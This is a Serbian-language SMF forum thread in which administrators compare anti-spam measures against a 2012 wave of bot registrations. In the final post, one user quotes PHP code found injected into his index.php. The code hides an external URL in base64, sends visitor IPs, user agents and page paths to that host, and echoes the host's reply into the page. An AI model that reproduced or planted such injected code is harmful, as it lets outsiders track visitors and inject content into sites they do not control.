News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

Spameri postaju ozbiljan problem!!

Started by Founder 2008, November 19, 2012, 09:58:49 AM

Previous topic - Next topic

Founder 2008

Quote from: Dzonny on November 16, 2012, 06:29:48 AM
Rekao bih da je Stop forum spam modul za nijansu bolji, jer zahteva manje izmena u izvornom smf kodu, a na kraju krajeva za bazu koriste isti servis - Honey Pot, ako se ne varam, tako da je samo način integracije različit, dok je stepen uspešnosti zaštite od spamera isti pošto se koristi ista baza za proveru da li je neki korisnik spamer ili ne. Mislim da ću i sam početi da koristim Stop forum spam ako mi se nastavi registracija spamera.
Promeniš pitanje pri registraciji ili postaviš random pitanje i nema šanse da prodju. :)

EDIT: Zbog aktuelnosti problema sa spamerima ova i niz poruka su izdvojene iz teme "Problemi s oglašavanjem".

Dzonny

Kako misliš da promenim pitanje, već imam nekih 10-15 pitanja koja se vrte, i to svaki put po dva pitanja. :P

Founder 2008

Jedino da promeniš komplet svih pitanja, nema druge. Eventualno još neki mod  ::)
Ja sam iz iskustva napisao jer čim promenim pitanje tu se završava priča.

Branko.

Neće biti baš tako jednostavno. Dzonny je dobro zapazio da spameri sve češće i uspješnije zaobilaze dosadašnje mjere. Evo jedne teme koja to ptvrđuje: http://www.simplemachines.org/community/index.php?topic=490833.0
Složićeš se da učesnici u ovoj temi nisu amateri već respektabilna SMF ekipa

Već sam napisao da mi mod odavno rješava taj problem a nimalo mi ne ometa registracije, a poodavno sam probao mnogo drugih kombinacija i nije valjalo.
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

Founder 2008

Normalno je da botovi budu sofisticiraniji, a i da spameri menjaju taktiku.
Druga stvar, nikada nije ni bilo da administratori nemaju nove izazove.  :D

P.S. Dzoni, promeni pitanja kod registracije da vidimo šta će da se desi  :P

Dzonny

Branko, ne mogu tu temu da vide regularni članovi :)

Elem, da definitivno se ovo ne dešava slučajno, gomili ljudi je odjednom pojačan broj registracija botova po danu, vidiš da čak uspevaju da se registruju kada je registracija isključena (!?) što znači i da ima neka rupa u smf-u...

Dzonny

Quote from: Čarobnjak on November 20, 2012, 06:27:38 PM
Normalno je da botovi budu sofisticiraniji, a i da spameri menjaju taktiku.
Druga stvar, nikada nije ni bilo da administratori nemaju nove izazove.  :D

P.S. Dzoni, promeni pitanja kod registracije da vidimo šta će da se desi  :P

Promenio malo, evo u prilogu kako izgleda sve to. Fora je da nema šanse da "normalni" botovi prodju pitanja na srpskom zar ne? Do sad mi se ni jedan jedini spamer nije registrovao ali odjednom gomila njih, svaki dan po bar deset spamera banujem i uklonim silne spam postove.

Branko.

Quote from: Dzonny on November 21, 2012, 05:31:26 AM
Branko, ne mogu tu temu da vide regularni članovi :)

Elem, da definitivno se ovo ne dešava slučajno, gomili ljudi je odjednom pojačan broj registracija botova po danu, vidiš da čak uspevaju da se registruju kada je registracija isključena (!?) što znači i da ima neka rupa u smf-u...
Sorry..nisam se sjetio.  :)
Da, vidio sam komentar za zabranjene registracije. Zaista zabrinjavajuće. Da li (i može li uopšte) takav propust nastati zbog nekog mod-a?
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

Founder 2008

Quote from: Dzonny on November 21, 2012, 05:53:01 AM
Fora je da nema šanse da "normalni" botovi prodju pitanja na srpskom zar ne?
Nikad ih nisam posebno analizirao, ali je očigledno da su napredniji, čim prolaze pitanja na srpskom, prolaze vizuelnu potvrdu sa "visokim šumom"...  i na mojim forumima se slično desilo. Promenio sam pitanja i tako ih se rešio.

Prost zaključak je da se borba protiv botova završava onog trenutka kada im se "servira" nešto na malo drugačiji način zavisno od situacije i konkretnog problema. Ukoliko bot ima rešenje naših pitanja-lako ćemo ih se rešiti promenom pitanja, ukoliko ima mogućnost da zaobidje sva pitanja i vizuelnu potvrdu - treba mu "servirati" neku novu situaciju.

Ako postoji propust u samoj instalaciji SMF-a ili nekom modu kao i propust u administriranju foruma onda je to već druga priča jer je tada bezbednost samog foruma potpuno ugrožena.

savicmi

I kod mene se bio povećao broj botova, a odavno ih nije bilo. Ja inače odobravam nove članove, kako bih eventualno primetio registrovanje duplih naloga, tako da lako uočim i botove (dovoljno je videti nick ili email), mada nakon instalacije moda "Stop Spammer", automatski se oni zacrvene, te je mod svakako koristan. Koristim vizuelnu potvrdu srednjeg nivoa i samo jedno antibot pitanje, koje sam promenio i otkako sam to uradio pre par dana, nijedan bot se nije registrovao, tako da je to upalilo. Ako bude potrebno, ubaciću i httpBL mod.

Ne znam zašto iko i čuva registrovane botove u bazi, umesto da ih briše što pre. Forumi opstaju ako su članovi aktivni, koliko god da ih ima, pa neka brojka od nekoliko hiljada članova ništa ne znači, ako se ništa korisno ne piše. Ja sam pre par meseci obrisao i regularne članove, koji su recimo registrovani pre više od godinu dana, a za to vreme nisu napisali nijedan post. Prosto, pošto je forum otvoren za goste. nema potrebe da imaju nalog ako se ne uključe u diskusije. Ako nekad požele da se uključe, registrovaće se ponovo  :) Ima ovde nekih koji reklamiraju svoje forume, a broj tema im nije znatno manji od broja postova, iz čega se zaključuje da se tu jedva i odvija neka diskusija. Još gore, negde ima više članova nego postova.

Branko.

Quote from: savicmi on November 24, 2012, 08:57:55 PM
I kod mene se bio povećao broj botova, a odavno ih nije bilo. Ja inače odobravam nove članove, kako bih eventualno primetio registrovanje duplih naloga, tako da lako uočim i botove (dovoljno je videti nick ili email), mada nakon instalacije moda "Stop Spammer", automatski se oni zacrvene, te je mod svakako koristan. Koristim vizuelnu potvrdu srednjeg nivoa i samo jedno antibot pitanje, koje sam promenio i otkako sam to uradio pre par dana, nijedan bot se nije registrovao, tako da je to upalilo. Ako bude potrebno, ubaciću i httpBL mod.
U zadnje vrijeme konstantno se bilježi "neobična" aktivnost spamera. Zaobilaze se, do skoro efikasne, zaštite. Ne pomaže ni podešavanje odobravanje registracija. Ukoliko se radi o, do sada neuočenom, sigurnosnom propustu u softveru to će SMF tim već riješiti. Ostaje pitanje nisu li brojne objavljene modifikacije pomogle svemu? Ne događa se svima isto. Zašto i u čemu je razlika?
Pogledajte temu SPAM - Bots Passing Admin Approval!
Za prvo vrijeme, iako nije trajno rješenje, treba podesiti odobravanje tema/poruka za goste da takve spam poruke ne budu vidljive ostalima.
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

Dzonny

Samo da napomenem da je vizuelna potvrda odavno izgubila smisao i da gotovo nema bota koji bi zaustavila osim ako nije najveći nivo, mada i to se prolazi...

Branko.

Zanimljivo je da ja nisam imao ni jedan takav slučaj. Jedini trag su pokušaji registrovanja u error logu a u SFS zaštiti o broju blokiranih. To je što se tiče sistema "registruj se i objavi". Ovdje se radi o objavljivanju spam poruka bez registracije a to je moguće samo ako gosti u dozvolama imaju bilo šta osim pretraga tema i poruka. Više me brine kako uspiju da oponašaju registrovanog člana i pišu pod njegovim imenom.  :o
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

Dzonny

Upravo mi je gost ostavio post na forumu. o.0 Naravno gosti nemaju mogućnost da pišu bilo šta niti da pokreću teme.
Tema: http://www.samo-opusteno.info/forum/sportske-vesti/sp-aleksandar_150x90/

Branko.

Zanimljivo...ovo postaje misterija. Šta misliš da mi pokrenemo neku posebnu temu o ovom problemu? Da svako od nas, nezavisno ima li problem sa spamovanjem, napiše koju smf verziju koristi, ima li portal ili neki cms, koje modove koristi. Možda uspijemo locirati što je zajedničko forumima koji imaju ovaj problem. Isto tako bi vidjeli razliku u odnosu na forume koji to nemaju (kao moj...da ga ne ureknem  :) ). Možda se nešto ispili iz tzv. statistike?
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

Dzonny

Ako možeš samo izdvoji iz ove teme postove i napravi novu temu gde ćemo moći o ovome da pričamo, ja sam sad preko telefona pa mi nezgodno.
Elem, sadržaj posta koji je ovaj gost kod mene ostavio je ustvari samo [html][/html]

Branko.

#16
U zadnje vrijeme je sve više onih koji uočavaju da spameri zaobilaze dosadašnje mjere zaštite. Upravo iz tog razloga je izdvojen dio poruka koji se odnosi na to (objašnjeno u edit-u prve poruke), čisto da pokušamo da nađemo neko objašnjenje.
U tom smislu, kod repliciranja, bi trebalo dostaviti i sledeće informacije:
1. SMF verzija
2. Postojeći portal ili neki CMS
3. Popis korištenih modifikacija
4. Opis tj. tip zaštite koju koristite
5. Ostalo za što mislite da može biti važno

Tema će biti pod sticky dok (i ako) bude aktuelna.  :)
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

savicmi

Pogledao sam temu koju je preporučio Branko, baš neobično šta se nekima dešava, verovatno postoji neki propust u nekom kodu. Videh da je neko preporučio CrawlProtect/CrawlTrack, pa možda nije loše i te skripte isprobati, bar da se spreče neki napadi tipa SQL injection. Ja za sada neću ništa dodavati kod sebe, jer nakon promene antibot pitanja, nemam problema, a ako se ponovo pojave spemeri ili se desi nešto kao kod Dzonny-ja, preduzeću već nešto.

Pročitah negde preporuke za ZB Block, koji štiti php sajtove, pa može se i to pogledati.

Zanimljiv je i ovaj sadržaj posta koji je gost ostavio kod Dzonny-ja, jer ako se ne varam, niko sem administratora ne može ni da koristi html bbc kod.

Branko.

#18
Mislim da CrawlProtect/CrawlTrack nije besplatan... ili se varam? Mislim da ima dovoljno razloga da budemo zabrinuti. Problemi se razlikuju u manifestaciji, izvor im je isti....
Da budemo operativniji i da nam diskusije budu sadržajnije, molba da svako stavi kraći info kako je navedeno u mom prethodnom postu. Znam da je malo dosadno, ali možda bude i korisno nekome?

Evo moje konfiguracije:
SMF verzija= 2.0.2,
Popis korištenih modifikacija:
1.Activity Bar 1.1
2.Activity in Profile 1.1
3.Attachments in Topics 1.0
4.Auto Email Inactive Users 1.7
5.AvatarSelect 1.2.1
6.Country Flags    2.0
7.Downloads System 1.4.1
8.Enable or Disable "Last Edit: by" for Administrators 1.4
9.ENotify 2.0.2
10.Google Analytics Code 1.4
11.Karma Buttons 1.1
12. LGF Mod 1.2
13.Registered Links 3.0
14.Remove "Last edit" mod    0.2.3
15.SMF Topic Prefix Mod 1.2.2
16.SMFPacks Shoutbox 1.0.3
17.Sortable Packages (and Installed Time) 1.3
18.Stop Spammer 2.3.9
19.Tapatalk SMF 2.0 RC5/Final Plugin 3.2.1
20.Topic Rating Bar    0.6.2
21.Topic Solved 1.1.1
22.Topic View Log 1.3    
23.Users Online Today 2.2    
24.Welcome Topic Mod 2.2    
25.YouTube BBCode 2.7

Zaštita:
SMF Antispam (aktivacija mejlom,zahtjevana potvrda kod registracije, za goste odobravanje poruka). Gostima sakrivene imejl adrese i detalji kontaktiranja članova. Mod Stop Spammer 2.3.9 ( provjera imejla) uz jedno lako verifikacijsko pitanje kod registracije.
Dodatno:Obavezan izbor avatara tek da malo zakomplikuje
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

UndertakerZA

Pozdrav 

Do pre par dana nisam imao problema sa botovima a onda je pocela navala sa svih strana.
Nijedan od njih nije nista pisao po fforumu do juce , kada je jedan za samo par minuta postavio preko 50 odgovora na raznorazne teme.Sve sam regovane botove obrisao i obrisao postove ovog koji je pisao.
Promenio sam pitanje i odgovor u Anti-Spam Verification Questions 1.02i za dva dana nije bilo novih registracija.

Verzija foruma 1.1.16


Spisak modova
1. Version Emulate Dropdown 1.4
2. Custom BBCode 2.00
3. Load Standard Language 1.0.2
4. blinkbbc 1.0
5. Karma Buttons 1.1
6. Enhanced Quick Reply Box 2.0.2
7. Redirection Boards 2.01
8. YouTube BBCode 2.6
9. New Style Message Icon 1.1
10. Tidy Child Boards 1.3
11. Anti Bot: Are You Human/Bot? 2.3
12. Anti-Spam Verification Questions 1.02
13. Highslide Image Viewer 1.6
14. Profile User Action 1.1
15. Country Flags 2.1
16. Hide Tag Special 1.8.5
17. SimplePortal 2.3.5
18. OS & Browser Detection 1.5
19. Share This Topic 2.8.2
20. SMF Sitemap 1.2.2
21. Board Notes 1.0.7
22. MCLegendII.2 3.0
23. Member Color Link 3.1
24. FontandSizeDropdown_1.3 1.3
25. Auto Email Inactive Users 1.7
26. Default Avatar 1.1.1

Zastita od botova :
Anti Bot: Are You Human/Bot? 2.3
Anti-Spam Verification Questions 1.02

Prilikom registracije pored ovoga koristim kao dodatak Country Flags 2.1 gde clan ima obavezu da izabere zemlju odakle dolazi.Kao prvu opciju za izbor stavio sam Robot sa prigodnom slicicom (u attachmentu se vidi) iz razloga sto su botovi iz niza ponudjenih opcija uvek birali prvu opciju, pa kada izaberu robot opciju samim tim znam da je bot u pitanju jer niko ne bi odabrao bas to . To je i bio slucaj u par ranijih registracija ali sada ne.Biraju i druge opcije drzava koje su im ponudjene.Znaci i tu zastitu su probili.

Sve ovo ste i vi , manje - vise napisali , ali primetio sam nesto , sto mi do pre tri dana nije bilo na forumu.Mozda to nista ne znaci ali nije naodmet da napisem.
U eror logu jutros su mi se pojavile preko 150 strana gresaka.
Odredjeni broj se odnosio na neuspele registracijeili pogresne lozinke ali ogroman broj mi je davao gresku koja se odnosila na liniju 396 u index.php fajlu u root foruma.Tu mi se pojavio ceo "kod" koji ja nisam dodao a niko sem mene nema pristup serveru.
Kako sam pre par meseci imao isti problem sa takvim necim , ja sam odradeo upgrade foruma i do sada nije bilo problema.
Evo i koda kako izgleda
<?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>


Nisam u poslednje vreme , mozda cak i tri meseca unazad , dodavao bilo koji mod.
Ne znam zasto se ovaj deo dodaje sam od sebe , mozda tako treba , ali ne verujem.
Cak mislim da je od njegovog pojavljivanja i pocela ova najezda botova na mom forumu. Ako nista drugo , onda je poceo ogroman broj gresaka da mi se javlja zbog njega.
Taj deo sam obrisao iz index.php i sada nema gresaka, tako sam radeo i pre upgrade foruma , ali se on pojavljivao sam nakon par dana , sto je i bio razlog sto sam uradeo upgrade celog foruma.
Opet kazem , ne znam da li ovo ima ikakve veze sa najezdom botova , ali nije naodmet napomenuti , nikad se ne zna.

Srdacan pozdrav i oprostite na opsirnosti mog pisanja.
   

Advertisement: